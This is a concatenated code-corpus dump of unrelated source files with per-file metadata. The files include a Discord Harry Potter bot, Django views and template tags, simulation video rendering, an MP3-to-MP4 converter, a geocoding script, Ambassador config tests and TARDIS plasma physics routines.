alias = pottermore_data["alias"]
else:
alias = ""
embed = discord.Embed(
title=pottermore_data["name"], description=alias, color=await ctx.embed_color()
)
name = pottermore_data["name"]
if name == "Harry Potter":
embed.set_thumbnail(url=harry)
if name == "Hermione Granger":
embed.set_thumbnail(url=hermione)
if name == "Lord Voldemort":
embed.set_thumbnail(url=voldemort)
if name == "Severus Snape":
embed.set_thumbnail(url=snape)
if name == "Albus Dumbledore":
embed.set_thumbnail(url=dumbledore)
if name == "Draco Malfoy":
embed.set_thumbnail(url=draco)
if name == "Ron Weasley":
embed.set_thumbnail(url=ron)
if name == "Rubeus Hagrid":
embed.set_thumbnail(url=hagrid)
if name == "Ginny Weasley":
embed.set_thumbnail(url=ginny)
if name == "Sirius Black":
embed.set_thumbnail(url=sirius)
if name == "Minerva McGonagall":
embed.set_thumbnail(url=mcgonagall)
if "house" in pottermore_data:
embed.add_field(name="House", value=pottermore_data["house"], inline=True)
if "school" in pottermore_data:
embed.add_field(name="School Name", value=pottermore_data["school"], inline=True)
if "role" in pottermore_data:
embed.add_field(name="Role", value=pottermore_data["role"], inline=True)
if "wand" in pottermore_data:
embed.add_field(name="Wand", value=pottermore_data["wand"], inline=True)
if "boggart" in pottermore_data:
embed.add_field(name="Boggart", value=pottermore_data["boggart"], inline=True)
if "patronus" in pottermore_data:
embed.add_field(name="Patronus", value=pottermore_data["patronus"], inline=True)
if pottermore_data["ministryOfMagic"] == False:
embed.add_field(name="Ministry of Magic", value="Not a member", inline=True)
else:
embed.add_field(name="Ministry of Magic", value="Member", inline=True)
if pottermore_data["orderOfThePhoenix"] == False:
embed.add_field(name="Order Of The Phoenix", value="Not a member", inline=True)
else:
embed.add_field(name="Order Of The Phoenix", value="Member", inline=True)
if pottermore_data["dumbledoresArmy"] == False:
embed.add_field(name="Dumbledores Army", value="Not a member", inline=True)
else:
embed.add_field(name="Dumbledores Army", value="Member", inline=True)
if pottermore_data["deathEater"] == False:
embed.add_field(name="DeathEater", value="No", inline=True)
else:
embed.add_field(name="DeathEater", value="Yes", inline=True)
embed.add_field(name="Blood Status", value=pottermore_data["bloodStatus"], inline=True)
embed.add_field(name="Species", value=pottermore_data["species"], inline=True)
if "animagus" in pottermore_data:
embed.add_field(name="Animagus", value=pottermore_data["animagus"], inline=True)
await ctx.send(embed=embed)
def cog_unload(self):
self.bot.loop.create_task(self.session.close())
| 48.154286
| 174
| 0.657411
| 6,523
| 0.773784
| 0
| 0
| 5,875
| 0.696916
| 5,705
| 0.67675
| 2,944
| 0.349229
|
b71f0ad71dba6e7fc8ad5d041a1cde7948bbc25f
| 117
|
py
|
Python
|
contacts/views/contact_views.py
|
Onlynfk/Freshdesk-CRM-Platform
|
67137af09f7daf6fa2d19a9e70d573548137c9db
|
[
"MIT"
] | null | null | null |
contacts/views/contact_views.py
|
Onlynfk/Freshdesk-CRM-Platform
|
67137af09f7daf6fa2d19a9e70d573548137c9db
|
[
"MIT"
] | null | null | null |
contacts/views/contact_views.py
|
Onlynfk/Freshdesk-CRM-Platform
|
67137af09f7daf6fa2d19a9e70d573548137c9db
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def contact(request):
return render(request, 'contacts/contact.html')
| 19.5
| 52
| 0.735043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.196581
|
b721a7e3b07e02d858ee3ed05e23ae34bf1e9c54
| 781
|
py
|
Python
|
algoritmos/PythonM2/desafio.py
|
MiguelTeixeiraUFPB/PythonM2
|
1ee07879b141eae4c4edd5f4ac43002b11167b2f
|
[
"MIT"
] | null | null | null |
algoritmos/PythonM2/desafio.py
|
MiguelTeixeiraUFPB/PythonM2
|
1ee07879b141eae4c4edd5f4ac43002b11167b2f
|
[
"MIT"
] | null | null | null |
algoritmos/PythonM2/desafio.py
|
MiguelTeixeiraUFPB/PythonM2
|
1ee07879b141eae4c4edd5f4ac43002b11167b2f
|
[
"MIT"
] | null | null | null |
idadevelho=0
s=0
f=0
for p in range(1,3):
    print('---person no. {}---'.format(p))
    nome=str(input('enter the name of person no. {}: '.format(p))).strip()
    idade=int(input('enter the age of person no. {}: '.format(p)))
    peso=float(input('enter the weight of person no. {}: '.format(p)))
    sexo=str(input('sex [M/F]: ')).upper().strip()
s+=idade
if p==1 and sexo=='M':
idadevelho=idade
nomevelho=nome
elif sexo=='M' and idade>idadevelho:
idadevelho=idade
nomevelho=nome
print()
if sexo=='F' and idade<20:
f+=1
nomemulher=nome
media=s/2
print('the name of the oldest man is',nomevelho)
print('the average age is {}'.format(media))
print('the number of women under 20 years old is {}'.format(f))
| 27.892857
| 67
| 0.581306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 234
| 0.296954
|
b721cd3010a8637974b6ec065b10132ac28ed47b
| 1,957
|
py
|
Python
|
createVideo.py
|
Thefalas/disksMD
|
1f3a0a1814baf1fd8905da2e88d2244de90d14ec
|
[
"MIT"
] | null | null | null |
createVideo.py
|
Thefalas/disksMD
|
1f3a0a1814baf1fd8905da2e88d2244de90d14ec
|
[
"MIT"
] | null | null | null |
createVideo.py
|
Thefalas/disksMD
|
1f3a0a1814baf1fd8905da2e88d2244de90d14ec
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu May 3 18:33:28 2018
@author: malopez
"""
import pandas as pd
import matplotlib.pyplot as plt
import cv2
images_folder = "C:/Users/malopez/Desktop/disksMD/images"
data_folder = "C:/Users/malopez/Desktop/disksMD/data"
output_video = './video4.mp4'
particle_radius = 1.0
n_particles = 90  # TODO: Why is 3 the minimum number of particles?
desired_collisions_per_particle = 10
n_collisions = n_particles*desired_collisions_per_particle
size_X = 60 # System size X
size_Y = 30 # System size Y
size_X_inches = 6*(size_X/size_Y)
size_Y_inches = 6
size_figure = (size_X_inches, size_Y_inches)
# Phenomenological constant ;p
circle_size = 11875*size_X_inches*size_Y_inches / (size_X*size_Y)
# circle_size = particle_radius*427500 / (size_X*size_Y)
for i in range(n_collisions):
file_name_pos = data_folder + "/xy"+'{0:05d}'.format(i)+".dat"
    pos = pd.read_table(file_name_pos, sep=r'\s+',
                        header=None, names=['x', 'y'])
img_name = images_folder+'/img'+'{0:05d}'.format(i)+".png"
fig, ax = plt.subplots(figsize=size_figure, dpi=250)
ax.set_xlim([0,size_X])
ax.set_ylim([0,size_Y])
plt.scatter(pos.x, pos.y, s=circle_size)
fig.savefig(img_name)
    print('Saving img no.: ' + str(i))
plt.close()
images = []
for i in range(n_collisions):
images.append(images_folder+'/img'+'{0:05d}'.format(i)+".png")
# Height and Width from first image
frame = cv2.imread(images[0])
height, width, channels = frame.shape
# Define the codec and create a VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'mp4v') # Be sure to use lower case
out = cv2.VideoWriter(output_video, fourcc, 30.0, (width, height))
print('Generating video, please wait')
for image in images:
frame = cv2.imread(image)
# Write out frame to video
out.write(frame)
# Release everything if job is finished
out.release()
print("The output video is {}".format(output_video))
| 29.651515
| 68
| 0.701073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 673
| 0.343718
|
b7222728ba7e52a01bbb0861ac4236dbfa5ce453
| 1,003
|
py
|
Python
|
utils/builder/register_builder/riscv/BootPriority.py
|
noahsherrill/force-riscv
|
500cec3017f619dbf853a497bf02eaeecca927c9
|
[
"Apache-2.0"
] | 111
|
2020-06-12T22:31:30.000Z
|
2022-03-19T03:45:20.000Z
|
utils/builder/register_builder/riscv/BootPriority.py
|
noahsherrill/force-riscv
|
500cec3017f619dbf853a497bf02eaeecca927c9
|
[
"Apache-2.0"
] | 34
|
2020-06-12T20:23:40.000Z
|
2022-03-15T20:04:31.000Z
|
utils/builder/register_builder/riscv/BootPriority.py
|
noahsherrill/force-riscv
|
500cec3017f619dbf853a497bf02eaeecca927c9
|
[
"Apache-2.0"
] | 32
|
2020-06-12T19:15:26.000Z
|
2022-02-20T11:38:31.000Z
|
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# BootPriority.py
#
# This file defines the BootPriority helper class.
# The boot priority class defines helper methods associated with boot priority
class BootPriority:
    # Returns the appropriate boot priority based on the name and type of
    # the register provided, and whether the register is write-only
def getBootPriority(aName=None, aType=None, aWriteOnly=0):
return 1
| 37.148148
| 78
| 0.755733
| 238
| 0.237288
| 0
| 0
| 0
| 0
| 0
| 0
| 872
| 0.869392
|
b72306e350f2a9f34586f4bdf8fb4a7f6ec9f932
| 4,141
|
py
|
Python
|
truffe2/generic/templatetags/generic_extras.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 9
|
2016-09-14T02:19:19.000Z
|
2020-10-18T14:52:14.000Z
|
truffe2/generic/templatetags/generic_extras.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 19
|
2016-11-09T21:28:51.000Z
|
2021-02-10T22:37:31.000Z
|
truffe2/generic/templatetags/generic_extras.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 13
|
2016-12-31T14:22:09.000Z
|
2020-12-27T19:43:19.000Z
|
from django import template
from django.utils.safestring import mark_safe
import bleach
from bleach.sanitizer import BleachSanitizer
from bleach.encoding import force_unicode
from bootstrap3.renderers import FieldRenderer
from bootstrap3.text import text_value
import html5lib
import re
register = template.Library()
pos = [(0, 0), (1, 0), (0, 1), (2, 3), (1, 2), (2, 1), (2, 2)]
re_spaceless = re.compile("(\n|\r)+")
@register.filter
def node_x(value):
x, _ = pos[value]
return x
@register.filter
def node_y(value):
_, y = pos[value]
return y
@register.filter
def get_attr(value, arg):
v = getattr(value, arg, None)
if hasattr(v, '__call__'):
v = v()
elif isinstance(value, dict):
v = value.get(arg)
if v is None:
return ''
return v
@register.filter
def call(obj, methodName):
method = getattr(obj, methodName)
if "__callArg" in obj.__dict__:
ret = method(*obj.__callArg)
del obj.__callArg
return ret
return method()
@register.filter
def args(obj, arg):
if "__callArg" not in obj.__dict__:
obj.__callArg = []
obj.__callArg += [arg]
return obj
@register.filter
def get_class(value):
return value.__class__.__name__
@register.filter
def is_new_for(obj, user):
return obj.is_new(user)
@register.simple_tag(takes_context=True)
def switchable(context, obj, user, id):
return 'true' if obj.may_switch_to(user, id) else 'false'
@register.assignment_tag(takes_context=True)
def get_list_quick_switch(context, obj):
if hasattr(obj.MetaState, 'list_quick_switch'):
return filter(lambda (status, __, ___): obj.may_switch_to(context['user'], status), obj.MetaState.list_quick_switch.get(obj.status, []))
@register.assignment_tag(takes_context=True)
def get_states_quick_switch(context, obj):
if hasattr(obj.MetaState, 'states_quick_switch'):
return filter(lambda (status, __): obj.may_switch_to(context['user'], status), obj.MetaState.states_quick_switch.get(obj.status, []))
@register.tag
def nocrlf(parser, token):
nodelist = parser.parse(('endnocrlf',))
parser.delete_first_token()
return CrlfNode(nodelist)
class CrlfNode(template.Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
rendered = self.nodelist.render(context).strip()
return re_spaceless.sub("", rendered)
@register.filter
def html_check_and_safe(value):
tags = bleach.ALLOWED_TAGS + ['div', 'br', 'font', 'p', 'table', 'tr', 'td', 'th', 'img', 'u', 'span', 'tbody', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr']
attrs = {
'*': ['class', 'style', 'color', 'align', 'title', 'data-toggle', 'data-placement'],
'a': ['href', 'rel'],
'img': ['src', 'alt'],
}
style = ['line-height', 'background-color', 'font-size', 'margin-top']
text = force_unicode(value)
class s(BleachSanitizer):
allowed_elements = tags
allowed_attributes = attrs
allowed_css_properties = style
strip_disallowed_elements = True
strip_html_comments = True
allowed_protocols = ['http', 'https', 'data']
parser = html5lib.HTMLParser(tokenizer=s)
return mark_safe(bleach._render(parser.parseFragment(text)))
class SimpleFieldRenderer(FieldRenderer):
def render(self):
# See if we're not excluded
if self.field.name in self.exclude.replace(' ', '').split(','):
return ''
# Hidden input requires no special treatment
if self.field.is_hidden:
return text_value(self.field)
# Render the widget
self.add_widget_attrs()
html = self.field.as_widget(attrs=self.widget.attrs)
self.restore_widget_attrs()
# Start post render
html = self.post_widget_render(html)
html = self.wrap_widget(html)
html = self.make_input_group(html)
html = self.append_to_field(html)
html = self.wrap_field(html)
return html
@register.simple_tag()
def simple_bootstrap_field(field):
return SimpleFieldRenderer(field).render()
| 26.375796
| 157
| 0.657088
| 1,226
| 0.296064
| 0
| 0
| 2,710
| 0.654431
| 0
| 0
| 496
| 0.119778
|
b7243a1265f9290fb4007832856d3ae61b5b1b98
| 1,158
|
py
|
Python
|
tests/conftest.py
|
inducer/courseflow
|
0f9786e3616dbedf08365d81a731f672b97ba9f5
|
[
"Unlicense"
] | 284
|
2015-01-09T12:02:28.000Z
|
2022-03-27T14:30:46.000Z
|
tests/conftest.py
|
inducer/courseflow
|
0f9786e3616dbedf08365d81a731f672b97ba9f5
|
[
"Unlicense"
] | 799
|
2015-02-26T08:49:46.000Z
|
2022-03-31T16:09:26.000Z
|
tests/conftest.py
|
davis68/relate
|
eb40c8c17d4a724a60de3caa3334521a833bad5c
|
[
"Unlicense"
] | 120
|
2015-01-30T18:00:56.000Z
|
2022-03-28T06:24:43.000Z
|
import pytest
# from pytest_factoryboy import register
def pytest_addoption(parser):
parser.addoption(
"--slow", action="store_true", default=False, help="run slow tests",
)
parser.addoption(
"--all", action="store_true", default=False, help="run all tests",
)
def _is_connection_psql():
from django.db import connection
return connection.vendor == 'postgresql'
def pytest_collection_modifyitems(config, items):
skip_pg = pytest.mark.skip(reason="connection is not a postgres database")
if not _is_connection_psql():
for item in items:
if "postgres" in item.keywords:
item.add_marker(skip_pg)
if config.getoption("--all"):
return
elif config.getoption("--slow"):
skip_non_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" not in item.keywords:
item.add_marker(skip_non_slow)
else:
skip_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" in item.keywords:
item.add_marker(skip_slow)
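# Illustrative companion test module (hypothetical, not part of conftest.py):
# "slow" tests run only with --slow or --all (and --slow skips everything
# else), while "postgres" tests are skipped automatically whenever the
# database backend is not PostgreSQL.
#
#   import pytest
#
#   @pytest.mark.slow
#   def test_expensive_flow():
#       ...
#
#   @pytest.mark.postgres
#   def test_fulltext_search():
#       ...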
| 30.473684
| 78
| 0.636442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 252
| 0.217617
|
b72448ecc9aed4165b8b074fbdda6ef50c31088e
| 2,210
|
py
|
Python
|
main.py
|
Kallu609/mp3-to-mp4-converter
|
780d4741b79a45c1e5541527a58313a36d665e47
|
[
"MIT"
] | null | null | null |
main.py
|
Kallu609/mp3-to-mp4-converter
|
780d4741b79a45c1e5541527a58313a36d665e47
|
[
"MIT"
] | null | null | null |
main.py
|
Kallu609/mp3-to-mp4-converter
|
780d4741b79a45c1e5541527a58313a36d665e47
|
[
"MIT"
] | 1
|
2020-03-28T02:57:32.000Z
|
2020-03-28T02:57:32.000Z
|
import subprocess
from mimetypes import MimeTypes
from os import devnull, getcwd, listdir, makedirs, walk
from os.path import basename, dirname, exists, isfile, join, splitext
from pprint import pprint
from urllib.request import pathname2url
ALLOWED_AUDIO_MIMETYPES = ['audio/mpeg']
ALLOWED_IMAGE_MIMETYPES = ['image/jpeg', 'image/png']
CWD = getcwd()
MP3_DIR = join(CWD, 'mp3')
# Setup necessary variables
mime = MimeTypes()
def get_mp3_dirs():
dirs = next(walk(MP3_DIR))[1]
return map(lambda d: join(MP3_DIR, d), dirs)
def get_mp3_files(dir_path):
files = [f for f in listdir(dir_path) if isfile(join(dir_path, f))]
full_paths = map(lambda f: join(dir_path, f), files)
mp3_files = filter(lambda f: (get_mime_type(f) in ALLOWED_AUDIO_MIMETYPES), full_paths)
return mp3_files
def get_image_file(dir_path):
files = [f for f in listdir(dir_path) if isfile(join(dir_path, f))]
full_paths = map(lambda f: join(dir_path, f), files)
for file_path in full_paths:
if get_mime_type(file_path) in ALLOWED_IMAGE_MIMETYPES:
return file_path
return False
def get_mime_type(file_path):
url = pathname2url(file_path)
mime_type = mime.guess_type(url)
return mime_type[0]
def convert_to_mp4(file_path, image_path):
dir_name = basename(dirname(file_path))
file_name = splitext(basename(file_path))[0]
target_dir = join(CWD, 'mp4', dir_name)
target_path = join(target_dir, file_name) + '.mp4'
if not exists(target_dir):
print(f'Directory doesn\'t exist. Creating "{target_dir}"')
makedirs(target_dir)
print(f'Converting "{file_name}"')
args = ['ffmpeg', '-loglevel', 'panic', '-y',
'-loop', '1', '-r', '1',
'-i', image_path,
'-i', file_path,
'-c:a', 'copy', '-vf', 'scale=720:-2',
'-shortest', target_path]
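    # Flag summary (added for clarity): -loop 1 -r 1 repeats the cover image
    # at 1 fps, -c:a copy keeps the MP3 audio untouched, scale=720:-2 resizes
    # to 720 px wide with an even height, and -shortest stops encoding when
    # the audio stream ends.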
subprocess.call(args)
def main():
dirs = get_mp3_dirs()
for d in dirs:
image_file = get_image_file(d)
if not image_file:
print(f'Could not find image file for "{d}". Continuing...')
continue
mp3_files = get_mp3_files(d)
for mp3_file in mp3_files:
convert_to_mp4(mp3_file, image_file)
print('Absolutely DONE.')
if __name__ == '__main__':
main()
| 26.95122
| 89
| 0.687783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 335
| 0.151584
|
b7247af0becba5f41e0c2a4a41f7a5b86547cdbf
| 24
|
py
|
Python
|
lang/Python/terminal-control-cursor-positioning-1.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | 1
|
2018-11-09T22:08:38.000Z
|
2018-11-09T22:08:38.000Z
|
lang/Python/terminal-control-cursor-positioning-1.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/terminal-control-cursor-positioning-1.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | 1
|
2018-11-09T22:08:40.000Z
|
2018-11-09T22:08:40.000Z
|
print("\033[6;3HHello")
| 12
| 23
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.666667
|
b724c571207a17423525239296130cc889afe81a
| 6,169
|
py
|
Python
|
ambassador/tests/ambassador_test.py
|
tesserai/ambassador
|
70fadc62872be9b041b90cba54d3920a21777548
|
[
"Apache-2.0"
] | 1
|
2019-01-22T05:36:23.000Z
|
2019-01-22T05:36:23.000Z
|
ambassador/tests/ambassador_test.py
|
tesserai/ambassador
|
70fadc62872be9b041b90cba54d3920a21777548
|
[
"Apache-2.0"
] | null | null | null |
ambassador/tests/ambassador_test.py
|
tesserai/ambassador
|
70fadc62872be9b041b90cba54d3920a21777548
|
[
"Apache-2.0"
] | null | null | null |
import sys
import difflib
import errno
import json
import logging
import functools
import os
import pytest
from shell import shell
from diag_paranoia import diag_paranoia, filtered_overview, sanitize_errors
VALIDATOR_IMAGE = "datawire/ambassador-envoy-alpine:v1.5.0-116-g7ccb25882"
DIR = os.path.dirname(__file__)
EXCLUDES = [ "__pycache__" ]
# TESTDIR = os.path.join(DIR, "tests")
TESTDIR = DIR
DEFAULT_CONFIG = os.path.join(DIR, "..", "default-config")
MATCHES = [ n for n in os.listdir(TESTDIR)
if (n.startswith('0') and os.path.isdir(os.path.join(TESTDIR, n)) and (n not in EXCLUDES)) ]
os.environ['SCOUT_DISABLE'] = "1"
#### decorators
def standard_setup(f):
func_name = getattr(f, '__name__', '<anonymous>')
# @functools.wraps(f)
def wrapper(directory, *args, **kwargs):
print("%s: directory %s" % (func_name, directory))
dirpath = os.path.join(TESTDIR, directory)
testname = os.path.basename(dirpath)
configdir = os.path.join(dirpath, 'config')
if os.path.exists(os.path.join(dirpath, 'TEST_DEFAULT_CONFIG')):
configdir = DEFAULT_CONFIG
print("%s: using config %s" % (testname, configdir))
return f(testname, dirpath, configdir, *args, **kwargs)
return wrapper
#### Utilities
def unified_diff(gold_path, current_path):
gold = json.dumps(json.load(open(gold_path, "r")), indent=4, sort_keys=True)
current = json.dumps(json.load(open(current_path, "r")), indent=4, sort_keys=True)
udiff = list(difflib.unified_diff(gold.split("\n"), current.split("\n"),
fromfile=os.path.basename(gold_path),
tofile=os.path.basename(current_path),
lineterm=""))
return udiff
#### Test functions
@pytest.mark.parametrize("directory", MATCHES)
@standard_setup
def test_config(testname, dirpath, configdir):
errors = []
if not os.path.isdir(configdir):
errors.append("configdir %s is not a directory" % configdir)
print("==== checking intermediate output")
ambassador = shell([ 'ambassador', 'dump', configdir ])
if ambassador.code != 0:
errors.append('ambassador dump failed! %s' % ambassador.code)
else:
current_raw = ambassador.output(raw=True)
current = None
gold = None
try:
current = sanitize_errors(json.loads(current_raw))
except json.decoder.JSONDecodeError as e:
errors.append("current intermediate was unparseable?")
if current:
current['envoy_config'] = filtered_overview(current['envoy_config'])
current_path = os.path.join(dirpath, "intermediate.json")
json.dump(current, open(current_path, "w"), sort_keys=True, indent=4)
gold_path = os.path.join(dirpath, "gold.intermediate.json")
if os.path.exists(gold_path):
udiff = unified_diff(gold_path, current_path)
if udiff:
errors.append("gold.intermediate.json and intermediate.json do not match!\n\n%s" % "\n".join(udiff))
print("==== checking config generation")
envoy_json_out = os.path.join(dirpath, "envoy.json")
try:
os.unlink(envoy_json_out)
except OSError as e:
if e.errno != errno.ENOENT:
raise
ambassador = shell([ 'ambassador', 'config', '--check', configdir, envoy_json_out ])
print(ambassador.errors(raw=True))
if ambassador.code != 0:
errors.append('ambassador failed! %s' % ambassador.code)
else:
envoy = shell([ 'docker', 'run',
'--rm',
'-v', '%s:/etc/ambassador-config' % dirpath,
VALIDATOR_IMAGE,
'/usr/local/bin/envoy',
'--base-id', '1',
'--mode', 'validate',
'-c', '/etc/ambassador-config/envoy.json' ],
verbose=True)
envoy_succeeded = (envoy.code == 0)
if not envoy_succeeded:
errors.append('envoy failed! %s' % envoy.code)
envoy_output = list(envoy.output())
if envoy_succeeded:
if not envoy_output[-1].strip().endswith(' OK'):
errors.append('envoy validation failed!')
gold_path = os.path.join(dirpath, "gold.json")
if os.path.exists(gold_path):
udiff = unified_diff(gold_path, envoy_json_out)
if udiff:
errors.append("gold.json and envoy.json do not match!\n\n%s" % "\n".join(udiff))
print("==== checking short-circuit with existing config")
ambassador = shell([ 'ambassador', 'config', '--check', configdir, envoy_json_out ])
print(ambassador.errors(raw=True))
if ambassador.code != 0:
errors.append('ambassador repeat check failed! %s' % ambassador.code)
if 'Output file exists' not in ambassador.errors(raw=True):
errors.append('ambassador repeat check did not short circuit??')
if errors:
print("---- ERRORS")
print("%s" % "\n".join(errors))
assert not errors, ("failing, errors: %d" % len(errors))
@pytest.mark.parametrize("directory", MATCHES)
@standard_setup
def test_diag(testname, dirpath, configdir):
errors = []
errorcount = 0
if not os.path.isdir(configdir):
errors.append("configdir %s is not a directory" % configdir)
errorcount += 1
results = diag_paranoia(configdir, dirpath)
if results['warnings']:
errors.append("[DIAG WARNINGS]\n%s" % "\n".join(results['warnings']))
if results['errors']:
errors.append("[DIAG ERRORS]\n%s" % "\n".join(results['errors']))
errorcount += len(results['errors'])
if errors:
print("---- ERRORS")
print("%s" % "\n".join(errors))
print("---- OVERVIEW ----")
print("%s" % results['overview'])
print("---- RECONSTITUTED ----")
print("%s" % results['reconstituted'])
assert errorcount == 0, ("failing, errors: %d" % errorcount)
| 31.635897
| 120
| 0.595396
| 0
| 0
| 0
| 0
| 4,334
| 0.702545
| 0
| 0
| 1,464
| 0.237316
|
b7253bf44267f3981869514c6f90cf8cf83b6b75
| 538
|
py
|
Python
|
geocode_missing.py
|
UoA-eResearch/billboards
|
196a4931dc7ed21a5ff001e539254b0a93ddad2c
|
[
"MIT"
] | null | null | null |
geocode_missing.py
|
UoA-eResearch/billboards
|
196a4931dc7ed21a5ff001e539254b0a93ddad2c
|
[
"MIT"
] | null | null | null |
geocode_missing.py
|
UoA-eResearch/billboards
|
196a4931dc7ed21a5ff001e539254b0a93ddad2c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import json
import googlemaps
import sys
import os
gmaps = googlemaps.Client(key=os.environ["GOOGLE_API_KEY"])
print(gmaps)
filename = sys.argv[1]
with open(filename) as f:
data = json.load(f)
for d in data:
if d.get("address") and not d.get("latitude"):
result = gmaps.geocode(d["address"])
print(result)
result = result[0]["geometry"]["location"]
d["latitude"] = result["lat"]
d["longitude"] = result["lng"]
with open(filename, "w") as f:
json.dump(data, f)
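# Expected input shape (illustrative; inferred from the code above): the JSON
# file holds a list of objects such as [{"address": "23 Symonds St, Auckland"}, ...];
# each geocoded entry gains "latitude" and "longitude" keys when the file is
# rewritten.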
| 23.391304
| 59
| 0.633829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.223048
|
b7262426be3d901c9e4c8163e1aff5cbb71a7660
| 48,109
|
py
|
Python
|
tardis/plasma/properties/continuum_processes.py
|
AlexHls/tardis
|
5d6e2299f35953a65e2c974994c55fe4aa3caae9
|
[
"BSD-3-Clause"
] | null | null | null |
tardis/plasma/properties/continuum_processes.py
|
AlexHls/tardis
|
5d6e2299f35953a65e2c974994c55fe4aa3caae9
|
[
"BSD-3-Clause"
] | 1
|
2020-07-20T16:45:52.000Z
|
2020-07-20T16:45:52.000Z
|
tardis/plasma/properties/continuum_processes.py
|
jordi5/tardis
|
2e1cb75c91ea842526b0c7c80a13cc8646178813
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
import numpy as np
import pandas as pd
from numba import prange, njit
from tardis import constants as const
from tardis.plasma.exceptions import PlasmaException
from tardis.plasma.properties.base import (
ProcessingPlasmaProperty,
Input,
TransitionProbabilitiesProperty,
)
from tardis.plasma.properties.j_blues import JBluesDiluteBlackBody
__all__ = [
"SpontRecombRateCoeff",
"StimRecombRateCoeff",
"PhotoIonRateCoeff",
"PhotoIonEstimatorsNormFactor",
"PhotoIonRateCoeffEstimator",
"StimRecombRateCoeffEstimator",
"CorrPhotoIonRateCoeff",
"BfHeatingRateCoeffEstimator",
"StimRecombCoolingRateCoeffEstimator",
"SpontRecombCoolingRateCoeff",
"RawRecombTransProbs",
"RawPhotoIonTransProbs",
"CollDeexcRateCoeff",
"CollExcRateCoeff",
"RawCollisionTransProbs",
"AdiabaticCoolingRate",
"FreeFreeCoolingRate",
"FreeBoundCoolingRate",
"BoundFreeOpacity",
"LevelNumberDensityLTE",
"PhotoIonBoltzmannFactor",
"FreeBoundEmissionCDF",
"RawTwoPhotonTransProbs",
"TwoPhotonEmissionCDF",
"TwoPhotonFrequencySampler",
"CollIonRateCoeffSeaton",
"CollRecombRateCoeff",
"RawCollIonTransProbs",
"BoundFreeOpacityInterpolator",
"FreeFreeOpacity",
"ContinuumOpacityCalculator",
"FreeFreeFrequencySampler",
"FreeBoundFrequencySampler",
]
N_A = const.N_A.cgs.value
K_B = const.k_B.cgs.value
C = const.c.cgs.value
H = const.h.cgs.value
A0 = const.a0.cgs.value
M_E = const.m_e.cgs.value
E = const.e.esu.value
BETA_COLL = (H ** 4 / (8 * K_B * M_E ** 3 * np.pi ** 3)) ** 0.5
F_K = (
16
/ (3.0 * np.sqrt(3))
* np.sqrt((2 * np.pi) ** 3 * K_B / (H ** 2 * M_E ** 3))
* (E ** 2 / C) ** 3
) # See Eq. 19 in Sutherland, R. S. 1998, MNRAS, 300, 321
FF_OPAC_CONST = (
(2 * np.pi / (3 * M_E * K_B)) ** 0.5 * 4 * E ** 6 / (3 * M_E * H * C)
) # See Eq. 6.1.8 in http://personal.psu.edu/rbc3/A534/lec6.pdf
logger = logging.getLogger(__name__)
njit_dict = {"fastmath": False, "parallel": False}
@njit(**njit_dict)
def integrate_array_by_blocks(f, x, block_references):
"""
Integrate a function over blocks.
This function integrates a function `f` defined at locations `x`
over blocks given in `block_references`.
Parameters
----------
f : numpy.ndarray, dtype float
2D input array to integrate.
x : numpy.ndarray, dtype float
1D array with the sample points corresponding to the `f` values.
block_references : numpy.ndarray, dtype int
1D array with the start indices of the blocks to be integrated.
Returns
-------
numpy.ndarray, dtype float
2D array with integrated values.
"""
integrated = np.zeros((len(block_references) - 1, f.shape[1]))
for i in prange(f.shape[1]): # columns
for j in prange(len(integrated)): # rows
start = block_references[j]
stop = block_references[j + 1]
integrated[j, i] = np.trapz(f[start:stop, i], x[start:stop])
return integrated
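# Illustrative example (not part of the original docstring): with
# x = np.array([0., 1., 2., 3.]), f = x[:, np.newaxis] and
# block_references = np.array([0, 2, 4]), the two blocks integrate to
# [[0.5], [2.5]] via the trapezoidal rule.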
# It is currently not possible to use scipy.integrate.cumulative_trapezoid in
# numba. So here is my own implementation.
@njit(**njit_dict)
def numba_cumulative_trapezoid(f, x):
"""
Cumulatively integrate f(x) using the composite trapezoidal rule.
Parameters
----------
f : numpy.ndarray, dtype float
Input array to integrate.
x : numpy.ndarray, dtype float
The coordinate to integrate along.
Returns
-------
numpy.ndarray, dtype float
The result of cumulative integration of f along x
"""
